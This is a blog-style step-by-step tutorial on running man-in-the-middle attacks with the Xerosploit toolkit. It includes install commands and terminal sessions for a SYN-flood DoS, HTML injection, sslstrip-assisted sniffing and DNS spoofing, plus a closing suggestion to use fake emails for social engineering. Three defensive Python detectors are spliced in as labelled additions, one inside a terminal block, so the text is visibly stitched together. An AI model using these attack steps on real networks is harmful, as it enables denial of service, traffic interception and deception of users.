Sploitech

How To Do Man In The Middle Attacks Using Xerosploit Toolkit


About Xerosploit

Xerosploit is a penetration testing toolkit whose goal is to perform man-in-the-middle attacks for testing purposes. It brings various modules for carrying out these attacks, and it can also perform denial-of-service attacks and port scanning. It is powered by bettercap and nmap.

Features

  • Port scanning
  • Network mapping
  • DoS attack
  • HTML code injection
  • JavaScript code injection
  • Download interception and replacement
  • Sniffing
  • DNS spoofing
  • Background audio reproduction
  • Images replacement
  • Driftnet
  • Webpage defacement and more …

Tools & Software Required:

  • One System Capable Of Running Kali Linux. (You can also use virtual machines to perform the hack)
  • One host machine of your own to be hacked.
  • Xerosploit

Installing Dependencies:

First, we need to install the dependencies that xerosploit needs in order to run:

  • Nmap
  • hping3
  • build-essential
  • ruby-dev
  • libpcap-dev
  • libgmp3-dev
  • tabulate
  • terminaltables

Copy and paste the command given below to install the necessary dependencies:

				
# Refresh the package lists, then install the system packages
sudo apt-get update
sudo apt-get install nmap hping3 build-essential ruby-dev libgmp3-dev libpcap-dev -y
# Install the two Python modules from source; the subshells keep both clones side by side
git clone https://github.com/Robpol86/terminaltables.git
(cd terminaltables && sudo python setup.py install)
git clone https://github.com/astanin/python-tabulate.git
(cd python-tabulate && sudo python setup.py install)
				
			

Installing Xerosploit:

After installing the dependencies, clone the xerosploit files from GitHub and run the installer. To do so, copy and paste the commands given below:

git clone https://github.com/LionSec/xerosploit
cd xerosploit && sudo python install.py
				
			

When the setup starts select your operating system and press enter:

				
					┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                     Xerosploit Installer                     █
█                                                              █
└══════════════════════════════════════════════════════════════┘

[++] Please choose your operating system.

1) Ubuntu / Kali linux / Others
2) Parrot OS

>>> 1

[++] Installing Xerosploit ...
Hit:1 http://http.re4son-kernel.com/re4son kali-pi InRelease
Hit:2 http://ftp.harukasan.org/kali kali-rolling InRelease
Hit:3 http://ftp.harukasan.org/kali kali-experimental InRelease
Reading package lists... Done
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Package python-pip is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
However the following packages replace it:
  python3-pip

E: Package 'python-pip' has no installation candidate
WARNING:  bin/xettercap is not executable
WARNING:  See https://guides.rubygems.org/specification-reference/ for help
  Successfully built RubyGem
  Name: xettercap
  Version: 1.5.7xerob
  File: xettercap-1.5.7xerob.gem
Successfully installed xettercap-1.5.7xerob
Parsing documentation for xettercap-1.5.7xerob
Done installing documentation for xettercap after 2 seconds
1 gem installed
Xerosploit has been successfully installed. Execute 'xerosploit' in your terminal.
				
			

Xerosploit is now installed successfully. To run it, type: xerosploit

				
					kali@kali:~$ sudo xerosploit
[sudo] password for kali: 
Traceback (most recent call last):
  File "/opt/xerosploit/xerosploit.py", line 27, in <module>
    from tabulate import tabulate
ImportError: No module named tabulate
				
			

If you get this error while running xerosploit, you have to install terminaltables and tabulate. Copy and paste the commands given below to install them correctly:

				
# The subshells return to the starting directory after each install
git clone https://github.com/Robpol86/terminaltables.git
(cd terminaltables && sudo python setup.py install)

git clone https://github.com/astanin/python-tabulate.git
(cd python-tabulate && sudo python setup.py install)
				
			

Now xerosploit starts without any error:

				
					kali@kali:~$ sudo xerosploit


        ▄  ▄███▄   █▄▄▄▄ ████▄    ▄▄▄▄▄   █ ▄▄  █     ████▄ ▄█    ▄▄▄▄▀
    ▀▄   █ █▀   ▀  █  ▄▀ █   █   █     ▀▄ █   █ █     █   █ ██ ▀▀▀ █
      █ ▀  ██▄▄    █▀▀▌  █   █ ▄  ▀▀▀▀▄   █▀▀▀  █     █   █ ██     █
     ▄ █   █▄   ▄▀ █  █  ▀████  ▀▄▄▄▄▀    █     ███▄  ▀████ ▐█    █
    █   ▀▄ ▀███▀     █                     █        ▀        ▐   ▀
     ▀              ▀                       ▀


[+]═══════════[ Author : @LionSec1 _-\|/-_ Website: www.neodrix.com ]═══════════[+]

                      [ Powered by Bettercap and Nmap ]

┌═════════════════════════════════════════════════════════════════════════════┐
█                                                                             █
█                         Your Network Configuration                          █
█                                                                             █
└═════════════════════════════════════════════════════════════════════════════┘

╒══════════════╤═══════════════════╤═════════════╤═════════╤════════════╕
│  IP Address  │    MAC Address    │   Gateway   │  Iface  │  Hostname  │
╞══════════════╪═══════════════════╪═════════════╪═════════╪════════════╡
├──────────────┼───────────────────┼─────────────┼─────────┼────────────┤
│ 192.168.1.5  │ B8:27:EB:29:5B:BF │ 192.168.1.1 │  wlan0  │    kali    │
╘══════════════╧═══════════════════╧═════════════╧═════════╧════════════╛

╔═════════════╦════════════════════════════════════════════════════════════════════╗
║             ║ XeroSploit is a penetration testing toolkit whose goal is to       ║
║ Information ║ perform man in the middle attacks for testing purposes.            ║
║             ║ It brings various modules that allow to realise efficient attacks. ║
║             ║ This tool is Powered by Bettercap and Nmap.                        ║
╚═════════════╩════════════════════════════════════════════════════════════════════╝

[+] Please type 'help' to view commands.

Xero ➮
				
			

Mapping Our Network

To start a man-in-the-middle attack, you have to be connected to the same network as your target.

After you are connected to the target network you have to scan for the target IP address.

				
					Xero ➮ help

╔══════════╦════════════════════════════════════════════════════════════════╗
║          ║                                                                ║
║          ║ scan     :  Map your network.                                  ║                                                                                 
║          ║                                                                ║                                                                                 
║          ║ iface    :  Manually set your network interface.               ║                                                                                 
║ COMMANDS ║                                                                ║                                                                                 
║          ║ gateway  :  Manually set your gateway.                         ║                                                                                 
║          ║                                                                ║                                                                                 
║          ║ start    :  Skip scan and directly set your target IP address. ║                                                                                 
║          ║                                                                ║                                                                                 
║          ║ rmlog    :  Delete all xerosploit logs.                        ║                                                                                 
║          ║                                                                ║                                                                                 
║          ║ help     :  Display this help message.                         ║                                                                                 
║          ║                                                                ║                                                                                 
║          ║ exit     :  Close Xerosploit.                                  ║                                                                                 
║          ║                                                                ║                                                                                 
╚══════════╩════════════════════════════════════════════════════════════════╝

[+] Please type 'help' to view commands.                                                                                                                      
                                                                                                                                                              
Xero ➮ 
				
			

To start mapping the network, type: scan

All the devices shown below are mine. Do not do this to hack anyone.

				
					Xero ➮ scan

[++] Mapping your network ...                                                                                                                                 
                                                                                                                                                              
[+]═══════════[ Devices found on your network ]═══════════[+]
                                                                                                                                                              
╔═════════════╦═══════════════════╦════════════════════════════╗
║ IP Address  ║ Mac Address       ║ Manufacturer               ║
╠═════════════╬═══════════════════╬════════════════════════════╣
║ 192.168.1.1 ║ 24:0B:88:AE:18:20 ║ (Unknown)                  ║
║ 192.168.1.2 ║ E0:13:B5:73:59:E3 ║ (vivo MobileCommunication) ║
║ 192.168.1.3 ║ E0:CC:F8:40:8B:E6 ║ (Xiaomi Communications)    ║
║ 192.168.1.6 ║ 98:48:27:D8:21:48 ║ (Tp-link Technologies)     ║
║ 192.168.1.7 ║ EA:A4:2A:21:CF:86 ║ (Unknown)                  ║
║ 192.168.1.5 ║ E4:5F:01:0A:D6:9E ║ (This device)              ║
║             ║                   ║                            ║
╚═════════════╩═══════════════════╩════════════════════════════╝

[+] Please choose a target (e.g. 192.168.1.10). Enter 'help' for more information.                                                                            
                                                                                                                                                              
Xero ➮ 192.168.1.6

				
			

Now select the target IP address. I am targeting (Tp-link Technologies).

				
					Xero ➮ 192.168.1.6

[++] 192.168.1.6 has been targeted.                                                                                                                           

[+] Which module do you want to load ? Enter 'help' for more information.
Xero»modules ➮
				
			

Choosing The Right Attack

After you select the target, xerosploit asks which attack you want to perform on it. Type help if you want to see the complete attack list.

				
					Xero»modules ➮ help

╔═════════╦══════════════════════════════════════════════════════════════════════╗
║         ║                                                                      ║
║         ║ pscan       :  Port Scanner                                          ║                                                                            
║         ║                                                                      ║                                                                            
║         ║ dos         :  DoS Attack                                            ║                                                                            
║         ║                                                                      ║                                                                            
║         ║ ping        :  Ping Request                                          ║                                                                            
║         ║                                                                      ║                                                                            
║         ║ injecthtml  :  Inject Html code                                      ║                                                                            
║         ║                                                                      ║                                                                            
║         ║ injectjs    :  Inject Javascript code                                ║                                                                            
║         ║                                                                      ║                                                                            
║         ║ rdownload   :  Replace files being downloaded                        ║                                                                            
║         ║                                                                      ║                                                                            
║         ║ sniff       :  Capturing information inside network packets          ║                                                                            
║ MODULES ║                                                                      ║                                                                            
║         ║ dspoof      :  Redirect all the http traffic to the specified one IP ║                                                                            
║         ║                                                                      ║                                                                            
║         ║ yplay       :  Play background sound in target browser               ║                                                                            
║         ║                                                                      ║                                                                            
║         ║ replace     :  Replace all web pages images with your own one        ║                                                                            
║         ║                                                                      ║                                                                            
║         ║ driftnet    :  View all images requested by your targets             ║                                                                            
║         ║                                                                      ║                                                                            
║         ║ move        :  Shaking Web Browser content                           ║                                                                            
║         ║                                                                      ║                                                                            
║         ║ deface      :  Overwrite all web pages with your HTML code           ║                                                                            
║         ║                                                                      ║                                                                            
╚═════════╩══════════════════════════════════════════════════════════════════════╝

[+] Which module do you want to load ? Enter 'help' for more information.                                                                                     
                                                                                                                                                              
Xero»modules ➮ 
				
			

You can select any attack you want to use on the target. In some cases, the attack might not work if the target is using a VPN. The table given below shows what you can do with each type of attack:

Module       What it does
pscan        Scans for the open ports on the target IP
dos          Uses hping3 (DNS flood attack) and makes the target internet & pc unresponsive
ping         Checks if the server or device is up or not
injecthtml   Inject HTML code in all visited webpages
injectjs     Inject JavaScript code in all visited webpages
rdownload    Replace files being downloaded
sniff        Capturing information inside network packets
dspoof       Redirect all the HTTP traffic to the specified one IP
move         Shaking Web Browser content
deface       Overwrite all web pages with your HTML code

Attack 1: Open Port Scanning

Let’s try out the first attack, the port scanner. It scans for open ports on network computers and retrieves the versions of the programs running on the detected ports.

				
					Xero»modules ➮ pscan   
 
┌══════════════════════════════════════════════════════════════┐                                                                                              
█                                                              █                                                                                              
█                         Port Scanner                         █                                                                                              
█                                                              █                                                                                              
█      Find open ports on network computers and retrieve       █                                                                                              
█     versions of programs running on the detected ports       █                                                                                              
└══════════════════════════════════════════════════════════════┘                                                                                              

[+] Enter 'run' to execute the 'pscan' command.                                                                                                               
                                                                                                                                                              
Xero»modules»pscan ➮ run

[++] Please wait ... Scanning ports on 192.168.1.1                                                                                                            
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.

[+]═════════[ Port scan result for 192.168.1.1 ]═════════[+]                                                                                                  
                                                                                                                                                              
╔═════════╦═════════╦═══════╗
║ SERVICE ║ PORT    ║ STATE ║
╠═════════╬═════════╬═══════╣
║ HTTP    ║ 80/TCP  ║ OPEN  ║
║ HTTPS   ║ 443/TCP ║ OPEN  ║
║         ║         ║       ║
╚═════════╩═════════╩═══════╝

				
			

Now we can see that ports 80 and 443 are open on the target device. If you want to go back to the menu, type: back

				
					Xero»modules»pscan ➮ back
				
			

Attack 2: DoS

Now let’s try a DoS against the target system: the module sends a succession of SYN requests to the target to make the system unresponsive to legitimate traffic.

				
					Xero»modules ➮ dos
 
┌══════════════════════════════════════════════════════════════┐                                                                                              
█                                                              █                                                                                              
█                          DoS Attack                          █                                                                                              
█                                                              █                                                                                              
█    Send a succession of SYN requests to a target's system    █                                                                                              
█    to make the system unresponsive to legitimate traffic     █                                                                                              
└══════════════════════════════════════════════════════════════┘                                                                                              

[+] Enter 'run' to execute the 'dos' command.                                                                                                                 
                                                                                                                                                              
Xero»modules»dos ➮ run

[++] Performing a DoS attack to 192.168.1.6 ...                                                                                                               
                                                                                                                                                              
[++] Press 'Ctrl + C' to stop.                                                                                                                                
                                                                                                                                                              
HPING 192.168.1.6 (wlan0 192.168.1.6): S set, 40 headers + 120 data bytes
hping in flood mode, no replies will be shown

				
			

On the target PC, I tried to run the Google speed test many times but it kept failing. After I stopped the attack, it started to load.
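
The hping line in the output above gives a defender two things to look for on the wire: a burst of bare SYN segments toward one host, and SYNs that carry data (the "120 data bytes"), which ordinary clients rarely send. This added example, not taken from Xerosploit or the original article, counts both over `tcpdump -nn` text lines; the capture is constructed, and its ports, window size, timestamps and threshold are assumptions.

```python
import re
from collections import Counter

# tcpdump -nn text line, e.g.
# "12:00:01.000001 IP 192.168.1.5.2001 > 192.168.1.6.80: Flags [S], seq 1, win 512, length 120"
LINE_RE = re.compile(
    r"^(?P<h>\d\d):(?P<m>\d\d):(?P<s>\d\d)\.\d+ IP "
    r"(?P<src>[\d.]+)\.\d+ > (?P<dst>[\d.]+)\.\d+: "
    r"Flags \[(?P<flags>[^\]]+)\].*?length (?P<length>\d+)"
)


def constructed_capture():
    """Constructed sample: one normal handshake, then 300 data-carrying SYNs in one second."""
    lines = [
        "12:00:00.100000 IP 192.168.1.6.51000 > 93.184.216.34.443: "
        "Flags [S], seq 10, win 64240, length 0",
        "12:00:00.120000 IP 93.184.216.34.443 > 192.168.1.6.51000: "
        "Flags [S.], seq 20, ack 11, win 65535, length 0",
        "12:00:00.120100 IP 192.168.1.6.51000 > 93.184.216.34.443: "
        "Flags [.], ack 21, win 64240, length 0",
    ]
    for i in range(300):
        lines.append(
            f"12:00:01.{i:06d} IP 192.168.1.5.{2000 + i} > 192.168.1.6.80: "
            f"Flags [S], seq {i}, win 512, length 120"
        )
    return lines


def syn_flood_findings(lines, rate_threshold=100):
    """Return sorted (destination, peak SYNs per second, SYNs with payload) per flooded host.

    Counting is keyed on the destination because a flood tool can vary its
    source addresses, which makes per-source counters useless.
    """
    per_second = Counter()    # (dst, second of day) -> bare SYNs seen
    with_payload = Counter()  # dst -> bare SYNs that carried data
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["flags"] != "S":  # "S." is a SYN-ACK reply, not a new request
            continue
        second = int(m["h"]) * 3600 + int(m["m"]) * 60 + int(m["s"])
        per_second[(m["dst"], second)] += 1
        if int(m["length"]) > 0:
            with_payload[m["dst"]] += 1
    peak = Counter()
    for (dst, _second), count in per_second.items():
        peak[dst] = max(peak[dst], count)
    return sorted(
        (dst, count, with_payload[dst])
        for dst, count in peak.items()
        if count >= rate_threshold
    )


if __name__ == "__main__":
    for dst, rate, payload in syn_flood_findings(constructed_capture()):
        print(f"{dst}: peak {rate} SYN/s, {payload} SYNs carrying data")
```

On a Linux target, SYN cookies (`net.ipv4.tcp_syncookies`) keep the listen queue usable while such a burst lasts.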

Attack 3: Html Injection

Now let’s try HTML injection. I am skipping ping because it’s not an attack and it’s very basic. When running injecthtml, you have to enter the path of your HTML file. You can also use BeEF (The Browser Exploitation Framework Project) to hook the browser of the target when he/she visits an unsecured website.

				
					Xero»modules ➮ injecthtml
 
┌══════════════════════════════════════════════════════════════┐                                                                                              
█                                                              █                                                                                              
█                         Inject Html                          █                                                                                              
█                                                              █                                                                                              
█           Inject Html code in all visited webpage            █                                                                                              
└══════════════════════════════════════════════════════════════┘                                                                                              

[+] Enter 'run' to execute the 'injecthtml' command.                                                                                                          
                                                                                                                                                              
Xero»modules»injecthtml ➮ run

[+] Specify the file containing html code you would like to inject.                                                                                           
                                                                                                                                                              
Xero»modules»Injecthtml ➮ /home/kali/sample.html

[++] Injecting Html code ...                                                                                                                                  

[++] Press 'Ctrl + C' to stop .

				
			

Whenever the target visits any unsecured website, your HTML code is injected into the page.

Attack 4: Packet Sniffing

Now we are going to capture some valuable information from the network packets, such as which websites the user visits. To start sniffing, type: sniff

During the attack, the module asks whether you want to load sslstrip, which will attempt to downgrade traffic so that we can pick up some interesting information that we might otherwise lose.

				
					Xero»modules ➮ sniff
 
┌══════════════════════════════════════════════════════════════┐                                                                                              
█                                                              █                                                                                              
█                           Sniffing                           █                                                                                              
█                                                              █                                                                                              
█      Capturing any data passed over your local network       █                                                                                              
└══════════════════════════════════════════════════════════════┘                                                                                              

[+] Please type 'run' to execute the 'sniff' command.                                                                                                         
                                                                                                                                                              
Xero»modules»sniff ➮ run

[+] Do you want to load sslstrip ? (y/n).                                                                                                                     
                                                                                                                                                              
Xero»modules»sniff ➮ y

[++] All logs are saved on : /opt/xerosploit/xerosniff                                                                                                        

[++] Sniffing on 192.168.1.6                                                                                                                                  

[++] sslstrip : ON                                                                                                                                            

[++] Press 'Ctrl + C' to stop .

				
			

When the attack starts, a new window pops up showing the websites the target visits.
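
Whether the sslstrip downgrade described above can work against a given site depends on that site's HSTS policy. This added example, which is not from the original article or from Xerosploit, parses a `Strict-Transport-Security` header following RFC 6797 and classifies how exposed the site's visitors are; the category names and sample headers are this example's own.

```python
import re

TOKEN = re.compile(r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+")
ONE_YEAR = 31536000  # smallest max-age accepted for the browser preload list


def parse_hsts(value):
    """Parse a Strict-Transport-Security value; return None if it is malformed."""
    seen = {}
    for part in value.split(";"):  # a ';' inside a quoted value is not handled
        part = part.strip()
        if not part:
            continue
        name, has_value, arg = part.partition("=")
        name, arg = name.strip().lower(), arg.strip()
        if len(arg) >= 2 and arg[0] == arg[-1] == '"':
            arg = arg[1:-1]  # quoted-string form: max-age="31536000"
        if not TOKEN.fullmatch(name) or name in seen:
            return None  # bad directive name, or a directive given twice
        seen[name] = arg if has_value else None
    age = seen.get("max-age")
    if age is None or not re.fullmatch(r"[0-9]+", age):
        return None  # max-age is the one required directive
    return {
        "max_age": int(age),
        "include_subdomains": "includesubdomains" in seen,
        "preload": "preload" in seen,
    }


def downgrade_exposure(scheme, headers):
    """Classify a response; headers is a list of (name, value) pairs."""
    if scheme != "https":
        # Browsers ignore HSTS on plain HTTP, and a man in the middle
        # can delete the header from such a response anyway.
        return "ignored-over-http"
    values = [v for k, v in headers if k.lower() == "strict-transport-security"]
    if not values:
        return "strippable-every-visit"
    policy = parse_hsts(values[0])  # only the first header field counts
    if policy is None:
        return "invalid-header-ignored"
    if policy["max_age"] == 0:
        return "policy-removed"  # max-age=0 tells the browser to forget the host
    if (policy["preload"] and policy["include_subdomains"]
            and policy["max_age"] >= ONE_YEAR):
        # Eligible is not the same as listed; only a listed site is
        # protected on the very first visit.
        return "preload-eligible"
    return "protected-after-first-visit"


if __name__ == "__main__":
    sample = [("Strict-Transport-Security", "max-age=63072000; includeSubDomains; preload")]
    print(downgrade_exposure("https", sample))
```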

Attack 5: DNS Spoofing

In this attack, whenever the target opens any secured or unsecured website, they will see your website instead of the original content, while the URL remains that of the site the user requested.

				
					Xero»modules ➮ dspoof
 
┌══════════════════════════════════════════════════════════════┐                                                                                              
█                                                              █                                                                                              
█                         DNS spoofing                         █                                                                                              
█                                                              █                                                                                              
█   Supply false DNS information to all target browsed hosts   █                                                                                              
█     Redirect all the http traffic to the specified one IP    █                                                                                              
└══════════════════════════════════════════════════════════════┘                                                                                              

[+] Enter 'run' to execute the 'dspoof' command.                                                                                                              
                                                                                                                                                              
Xero»modules»dspoof ➮ run

[+] Enter the IP address where you want to redirect the traffic.                                                                                              
                                                                                                                                                              
Xero»modules»dspoof ➮ 192.168.1.5

[++] Redirecting all the traffic to 192.168.1.5 ...                                                                                                           

[++] Press 'Ctrl + C' to stop . 
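
Redirecting every lookup to one LAN address, as in the session above, leaves a recognisable pattern in resolver logs: unrelated public names all answering with the same internal IP. This added example, not part of the original article or of Xerosploit, flags that pattern in a list of (name, answer) pairs; the sample answers, the local-suffix list and the two-label domain grouping are assumptions of the example.

```python
import ipaddress
from collections import defaultdict

INTERNAL_NETS = [
    ipaddress.ip_network(n)
    for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")
]
# Names that are expected to resolve to internal addresses (adjust per site).
LOCAL_SUFFIXES = (".lan", ".local", ".home.arpa", ".internal")

# Constructed sample: what a resolver log on the targeted host could look like.
CLEAN_ANSWERS = [
    ("www.example.com.", "93.184.216.34"),
    ("printer.lan", "192.168.1.20"),
]
SPOOFED_ANSWERS = [
    ("www.example.com.", "192.168.1.5"),
    ("login.example.net", "192.168.1.5"),
    ("cdn.example.org", "192.168.1.5"),
    ("printer.lan", "192.168.1.20"),
    ("router", "192.168.1.1"),
]


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def dns_spoof_findings(answers, min_domains=3):
    """Report public names answered with internal IPs, grouped by answer address."""
    hits = []
    domains_by_ip = defaultdict(set)
    for name, ip in answers:
        name = name.rstrip(".").lower()
        # Single-label and local-suffix names legitimately map to LAN hosts.
        if "." not in name or name.endswith(LOCAL_SUFFIXES):
            continue
        if is_internal(ip):
            hits.append((name, ip))
            # Last two labels approximate the registered domain (no suffix list used).
            domains_by_ip[ip].add(".".join(name.split(".")[-2:]))
    # One internal address answering for several unrelated domains is the
    # strong signal; a single hit can be a captive portal or split-horizon DNS.
    targets = sorted(
        (ip, sorted(domains))
        for ip, domains in domains_by_ip.items()
        if len(domains) >= min_domains
    )
    return {"public_name_to_internal_ip": hits, "redirect_targets": targets}


if __name__ == "__main__":
    print(dns_spoof_findings(SPOOFED_ANSWERS))
```

DNSSEC validation or an encrypted resolver channel (DoT/DoH) on the client prevents forged answers from being accepted in the first place.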

				
			

Attack 6: Shaking The Target Browser

In this attack, whenever the target visits any unsecured website, a JavaScript file is injected that makes the content of their browser shake.

				
					Xero»modules ➮ move 
 
┌══════════════════════════════════════════════════════════════┐                                                                                              
█                                                              █                                                                                              
█                           Shakescreen                        █                                                                                              
█                                                              █                                                                                              
█                   Shaking Web Browser content                █                                                                                              
└══════════════════════════════════════════════════════════════┘                                                                                              

[+] Enter 'run' to execute the 'move' command.                                                                                                                
                                                                                                                                                              
Xero»modules»shakescreen ➮ run

[++] Injecting shakescreen.js  ...                                                                                                                            

[++] Press 'Ctrl + C' to stop . 

				
			

Attack 7: Replacing All Images

In this attack, whenever the target visits any unsecured website, all the images will be replaced with your chosen image.

Try Out Its Other Modules

Module       What it does
yplay        Play a YouTube video in the background of browsers
injectjs     Inject JavaScript into websites loaded by others on the network
ping         Checks if the server or device is up or not
rdownload    Replace files being downloaded with your own.
deface       Swap out every webpage with your own HTML
driftnet     View all images requested by your targets

Conclusion

These types of attacks are not 100% successful, and they can only be used against unsecured websites which do not use SSL. Many people avoid not-secure websites these days and use a VPN, so these attacks cannot fully succeed without social engineering, such as sending a fake email in which the user might be interested.
